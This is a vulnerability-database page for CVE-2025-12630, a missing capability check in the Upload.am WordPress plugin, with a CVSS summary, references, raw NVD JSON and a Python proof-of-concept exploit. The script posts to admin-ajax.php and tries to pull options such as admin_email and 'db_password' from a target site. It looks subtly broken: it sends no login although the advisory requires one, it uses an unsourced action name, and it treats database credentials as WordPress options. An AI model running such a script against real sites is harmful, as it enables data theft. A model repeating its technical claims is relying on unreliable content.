CVE-2025-12630

Description

The Upload.am WordPress plugin before 1.0.1 is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing users such as contributor to view site options.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Upload.am WordPress plugin < 1.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12630 PoC - Upload.am WordPress Plugin Option Disclosure
# Affected: Upload.am plugin < 1.0.1

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# Target options to retrieve
options_to_exfiltrate = [
    'siteurl',
    'home',
    'blogname',
    'admin_email',
    'db_host',
    'db_name',
    'db_user',
    'db_password',
    'table_prefix'
]

def exploit_option_disclosure(target_url, option_name):
    """
    Exploit the missing capability check in Upload.am plugin
    to retrieve arbitrary WordPress options
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Craft the AJAX request that exploits the vulnerability
    data = {
        'action': 'upload_am_get_option',  # Plugin's AJAX action
        'option_name': option_name
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            return response.text
    except requests.RequestException as e:
        return f"Error: {e}"
    
    return None

print(f"[*] Targeting: {target}")
print(f"[*] Exploiting CVE-2025-12630...\n")

for option in options_to_exfiltrate:
    result = exploit_option_disclosure(target, option)
    if result and 'Error' not in str(result):
        print(f"[+] Option: {option}")
        print(f"    Value: {result[:200]}...\n")

print("[*] Exploitation complete")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12630
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12630
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12630/
[4] VulDB https://vuldb.com/cve/CVE-2025-12630
[5] https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12630", "sourceIdentifier": "[email protected]", "published": "2025-12-02T16:15:53.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Upload.am WordPress plugin before 1.0.1 is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing users such as contributor to view site options."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/531537f1-5547-4b0f-9e11-3f8a0b2589f5/", "source": "[email protected]"}]}}